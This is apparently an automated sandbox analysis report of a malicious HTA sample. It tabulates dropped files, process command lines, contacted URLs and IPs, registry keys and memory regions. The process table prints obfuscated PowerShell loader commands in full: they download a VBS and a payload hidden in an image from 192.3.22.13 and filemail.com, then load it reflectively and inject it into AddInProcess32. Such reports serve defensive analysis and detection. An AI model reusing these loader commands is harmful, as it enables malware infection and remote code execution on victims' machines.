Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
seethebestthingswithgreatsituationshandletotheprogress.hta
|
HTML document, ASCII text, with very long lines (65536), with no line terminators
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (372), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS
|
Unicode text, UTF-16, little-endian text, with very long lines (381), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\seethebestthingsentiretimewithgreatthingswithloverkiss[1].tiff
|
Unicode text, UTF-16, little-endian text, with very long lines (381), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\RES4D39.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Wed Nov 20 09:26:00 2024,
1st section name ".debug$S"
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2cdsohkt.0hm.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3yqxz5ix.u1u.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4h0kjita.4yz.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kh2x5wpd.ccy.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxcn21ql.1qb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_typn21qo.zuv.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ujlalfbm.aqm.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vvbquj4a.30t.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xjrnsgic.mqv.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xk02v1nn.r3d.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\ndpe2s1t\CSCD8BAC46370384FA881732B4F85FC96.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (370)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (455), with CRLF, CR line terminators
|
modified
|
There are 11 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\SysWOW64\mshta.exe
|
mshta.exe "C:\Users\user\Desktop\seethebestthingswithgreatsituationshandletotheprogress.hta"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX
bYPAsS -noP -W 1
-c DEvIceCrEdenTialdEPLoyment.Exe ;
INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.cmdline"
|
||
C:\Windows\SysWOW64\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t
= [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex
= Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex
-g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command
= Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray()
59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly
= [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null,
@(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m,
F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)|
.((Get-VARIabLE '*mdr*').Name[3,11,2]-JoiN'')"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D39.tmp"
"c:\Users\user\AppData\Local\Temp\ndpe2s1t\CSCD8BAC46370384FA881732B4F85FC96.TMP"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 1 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://1017.filemail.com/api/file/get?filekey=2
|
unknown
|
||
http://192.3.22.13/352/WRFFRF.txt
|
192.3.22.13
|
||
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIF
|
192.3.22.13
|
||
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S
|
unknown
|
||
http://192.3.22.13/xampp/se/seet
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIFdB
|
unknown
|
||
https://account.dyn.com/
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIFlaF
|
unknown
|
||
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIFM
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
|
142.215.209.78
|
||
https://1017.filemail.com
|
unknown
|
||
http://go.micros
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://crl.m
|
unknown
|
||
https://1017.filemail.com/api/file/get?filekLR
|
unknown
|
||
http://crl.micro
|
unknown
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
http://ip-api.com
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIF.f
|
unknown
|
||
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
There are 22 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
ip-api.com
|
208.95.112.1
|
||
ip.1017.filemail.com
|
142.215.209.78
|
||
1017.filemail.com
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
192.3.22.13
|
unknown
|
United States
|
||
142.215.209.78
|
ip.1017.filemail.com
|
Canada
|
||
208.95.112.1
|
ip-api.com
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
FileDirectory
|
There are 19 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
9526000
|
trusted library allocation
|
page read and write
|
||
402000
|
remote allocation
|
page execute and read and write
|
||
6590000
|
trusted library allocation
|
page read and write
|
||
2EB5000
|
trusted library allocation
|
page read and write
|
||
5E83000
|
heap
|
page read and write
|
||
67A7000
|
heap
|
page read and write
|
||
6CDF000
|
trusted library allocation
|
page read and write
|
||
8DE0000
|
trusted library allocation
|
page read and write
|
||
86FB000
|
heap
|
page read and write
|
||
6785000
|
heap
|
page read and write
|
||
5FE3000
|
heap
|
page read and write
|
||
7C90000
|
trusted library allocation
|
page read and write
|
||
34F4000
|
heap
|
page read and write
|
||
2C4E000
|
stack
|
page read and write
|
||
3030000
|
trusted library allocation
|
page read and write
|
||
30B0000
|
heap
|
page read and write
|
||
30AE000
|
stack
|
page read and write
|
||
6CFF000
|
trusted library allocation
|
page read and write
|
||
8C70000
|
trusted library allocation
|
page read and write
|
||
EAE000
|
heap
|
page read and write
|
||
3458000
|
heap
|
page read and write
|
||
32E0000
|
heap
|
page read and write
|
||
88E0000
|
heap
|
page read and write
|
||
6CDF000
|
trusted library allocation
|
page read and write
|
||
6778000
|
heap
|
page read and write
|
||
2F52000
|
trusted library allocation
|
page read and write
|
||
55CB000
|
heap
|
page read and write
|
||
859000
|
heap
|
page read and write
|
||
6795000
|
heap
|
page read and write
|
||
6CDF000
|
trusted library allocation
|
page read and write
|
||
6E1E000
|
stack
|
page read and write
|
||
6121000
|
trusted library allocation
|
page read and write
|
||
4FA8000
|
heap
|
page read and write
|
||
606E000
|
heap
|
page read and write
|
||
7C0A000
|
heap
|
page read and write
|
||
E3D000
|
stack
|
page read and write
|
||
62B9000
|
trusted library allocation
|
page read and write
|
||
6122000
|
trusted library allocation
|
page read and write
|
||
6C40000
|
trusted library allocation
|
page read and write
|
||
7720000
|
trusted library allocation
|
page read and write
|
||
2C58000
|
trusted library allocation
|
page read and write
|
||
34B5000
|
heap
|
page read and write
|
||
340D000
|
stack
|
page read and write
|
||
7494000
|
heap
|
page read and write
|
||
71E2000
|
direct allocation
|
page read and write
|
||
52DE000
|
trusted library allocation
|
page read and write
|
||
34B5000
|
heap
|
page read and write
|
||
30E8000
|
heap
|
page read and write
|
||
851000
|
heap
|
page read and write
|
||
88AD000
|
trusted library allocation
|
page read and write
|
||
34D0000
|
heap
|
page read and write
|
||
346E000
|
stack
|
page read and write
|
||
3430000
|
heap
|
page read and write
|
||
6CFF000
|
trusted library allocation
|
page read and write
|
||
9B7000
|
stack
|
page read and write
|
||
6CFF000
|
trusted library allocation
|
page read and write
|
||
5F4C000
|
heap
|
page read and write
|
||
86F000
|
heap
|
page read and write
|
||
863E000
|
stack
|
page read and write
|
||
49B0000
|
heap
|
page read and write
|
||
5C7E000
|
stack
|
page read and write
|
||
36E0000
|
heap
|
page read and write
|
||
7AD0000
|
trusted library allocation
|
page read and write
|
||
5DE1000
|
trusted library allocation
|
page read and write
|
||
34BB000
|
heap
|
page read and write
|
||
4FA9000
|
heap
|
page read and write
|
||
6799000
|
heap
|
page read and write
|
||
5445000
|
heap
|
page read and write
|
||
5D91000
|
trusted library allocation
|
page read and write
|
||
67EF000
|
heap
|
page read and write
|
||
6795000
|
heap
|
page read and write
|
||
523E000
|
stack
|
page read and write
|
||
61C4000
|
trusted library allocation
|
page read and write
|
||
3020000
|
trusted library allocation
|
page read and write
|
||
8D2000
|
heap
|
page read and write
|
||
3370000
|
heap
|
page read and write
|
||
110D000
|
trusted library allocation
|
page execute and read and write
|
||
32B6000
|
heap
|
page read and write
|
||
6FAB000
|
stack
|
page read and write
|
||
30C0000
|
trusted library allocation
|
page execute and read and write
|
||
867000
|
heap
|
page read and write
|
||
6CFF000
|
trusted library allocation
|
page read and write
|
||
6A00000
|
heap
|
page read and write
|
||
3013000
|
trusted library allocation
|
page execute and read and write
|
||
34E5000
|
heap
|
page read and write
|
||
520000
|
heap
|
page read and write
|
||
86D000
|
heap
|
page read and write
|
||
72AE000
|
stack
|
page read and write
|
||
7C30000
|
trusted library allocation
|
page execute and read and write
|
||
F20000
|
heap
|
page read and write
|
||
85B000
|
heap
|
page read and write
|
||
34E8000
|
heap
|
page read and write
|
||
1025000
|
heap
|
page read and write
|
||
7F0000
|
heap
|
page read and write
|
||
5310000
|
trusted library allocation
|
page read and write
|
||
34DD000
|
heap
|
page read and write
|
||
6CFF000
|
trusted library allocation
|
page read and write
|
||
3273000
|
heap
|
page read and write
|
||
898F000
|
stack
|
page read and write
|
||
6550000
|
trusted library allocation
|
page read and write
|
||
1122000
|
trusted library allocation
|
page read and write
|
||
50F8000
|
trusted library allocation
|
page read and write
|
||
67BC000
|
heap
|
page read and write
|
||
34DD000
|
heap
|
page read and write
|
||
810000
|
heap
|
page read and write
|
||
8DF000
|
heap
|
page read and write
|
||
6CFF000
|
trusted library allocation
|
page read and write
|
||
DFD000
|
stack
|
page read and write
|
||
565F000
|
heap
|
page read and write
|
||
86F5000
|
heap
|
page read and write
|
||
5617000
|
heap
|
page read and write
|
||
54FE000
|
stack
|
page read and write
|
||
561B000
|
heap
|
page read and write
|
||
3000000
|
heap
|
page read and write
|
||
34FD000
|
heap
|
page read and write
|
||
DEF000
|
stack
|
page read and write
|
||
75E0000
|
trusted library allocation
|
page read and write
|
||
554D000
|
stack
|
page read and write
|
||
676A000
|
heap
|
page read and write
|
||
6CFF000
|
trusted library allocation
|
page read and write
|
||
4F24000
|
heap
|
page read and write
|
||
780000
|
heap
|
page read and write
|
||
6121000
|
trusted library allocation
|
page read and write
|
||
873000
|
heap
|
page read and write
|
||
5373000
|
heap
|
page read and write
|
||
5E10000
|
heap
|
page read and write
|
||
1170000
|
heap
|
page read and write
|
||
643F000
|
trusted library allocation
|
page read and write
|
||
4DE1000
|
trusted library allocation
|
page read and write
|
||
90D000
|
heap
|
page read and write
|
||
60E5000
|
heap
|
page read and write
|
||
6291000
|
trusted library allocation
|
page read and write
|
||
34F8000
|
heap
|
page read and write
|
||
6645000
|
heap
|
page read and write
|
||
7E20000
|
trusted library allocation
|
page read and write
|
||
5320000
|
trusted library allocation
|
page read and write
|
||
7A70000
|
trusted library allocation
|
page read and write
|
||
7C7E000
|
stack
|
page read and write
|
||
31DC000
|
heap
|
page read and write
|
||
1258000
|
heap
|
page read and write
|
||
9E0000
|
heap
|
page read and write
|
||
3189000
|
trusted library allocation
|
page read and write
|
||
56DE000
|
heap
|
page read and write
|
||
75CD000
|
stack
|
page read and write
|
||
52DB000
|
trusted library allocation
|
page read and write
|
||
5EBD000
|
stack
|
page read and write
|
||
34C1000
|
heap
|
page read and write
|
||
923000
|
heap
|
page read and write
|
||
678C000
|
heap
|
page read and write
|
||
48D0000
|
trusted library allocation
|
page read and write
|
||
761D000
|
stack
|
page read and write
|
||
3378000
|
trusted library allocation
|
page read and write
|
||
7AB0000
|
trusted library allocation
|
page read and write
|
||
6CDF000
|
trusted library allocation
|
page read and write
|
||
4E19000
|
trusted library allocation
|
page read and write
|
||
642E000
|
stack
|
page read and write
|
||
5418000
|
heap
|
page read and write
|
||
611A000
|
trusted library allocation
|
page read and write
|
||
5DA1000
|
trusted library allocation
|
page read and write
|
||
88B0000
|
trusted library allocation
|
page read and write
|
||
67BC000
|
heap
|
page read and write
|
||
67A7000
|
heap
|
page read and write
|
||
6125000
|
trusted library allocation
|
page read and write
|
||
34BD000
|
heap
|
page read and write
|
||
